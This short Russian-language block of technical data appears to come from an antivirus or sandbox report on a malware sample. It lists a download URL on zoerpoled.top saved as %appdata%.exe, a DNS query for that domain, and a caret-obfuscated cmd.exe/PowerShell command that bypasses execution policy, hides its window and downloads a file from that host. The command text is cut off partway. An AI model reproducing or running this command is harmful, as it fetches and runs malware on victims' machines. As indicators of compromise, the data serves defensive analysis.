Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POw^E^Rsh^E^ll.^ExE -^exeCuti^on^PolIcY B^yPASS ^-nOP^R^O^fIle^ ^-^wIND^o^W^stYlE hId^de^n (NE^W-O^Bj^e^Ct sYS^Tem.n^Et^.wEb^c^LIE^NT^).DoWNlO^a^DfILe^('http://www.zoerpoled.t...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "POw^E^Rsh^E^ll.^ExE -^exeCuti^on^PolIcY B^yPASS ^-nOP^R^O^fIle^ ^-^wIND^o^W^stYlE hId^de^n (NE^W-O^Bj^e^Ct sYS^Tem.n^Et^.wEb^c^LIE^NT^).DoWNlO^a^DfILe^('http://www.zoerpoled.t...' (со скрытым окном)